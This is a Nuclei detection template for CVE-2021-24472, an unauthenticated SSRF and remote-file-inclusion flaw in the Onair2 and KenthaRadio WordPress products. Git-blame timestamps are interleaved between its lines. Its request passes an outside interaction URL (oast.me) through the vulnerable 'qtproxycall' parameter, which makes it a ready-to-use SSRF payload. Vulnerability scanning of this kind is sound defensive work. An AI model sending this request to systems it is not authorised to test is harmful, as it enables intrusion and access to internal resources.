nuclei-templates/http/cves/2021/CVE-2021-24472.yaml

43 lines
1.3 KiB
YAML
Raw Normal View History

2021-07-13 13:50:10 +00:00
id: CVE-2021-24472
info:
name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery
author: Suman_Kar
severity: critical
2023-08-04 06:44:56 +00:00
description: |
Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.
reference:
- https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a
2023-08-04 06:44:56 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24472
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24472
cwe-id: CWE-918
epss-score: 0.01878
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
2023-08-04 06:44:56 +00:00
verified: true
publicwww-query: "/wp-content/plugins/qt-kentharadio"
2023-07-11 19:49:27 +00:00
framework: wordpress
vendor: qantumthemes
product: kentharadio
2023-08-04 06:44:56 +00:00
tags: wordpress,lfi,ssrf,wp,wp-plugin,wpscan,cve,cve2021
http:
2023-08-04 06:44:56 +00:00
- method: GET
path:
- '{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me'
matchers-condition: and
matchers:
- type: word
2023-08-04 06:44:56 +00:00
part: body
words:
2023-08-04 06:44:56 +00:00
- "<h1> Interactsh Server </h1>"
2021-07-13 13:50:10 +00:00
- type: status
status:
- 200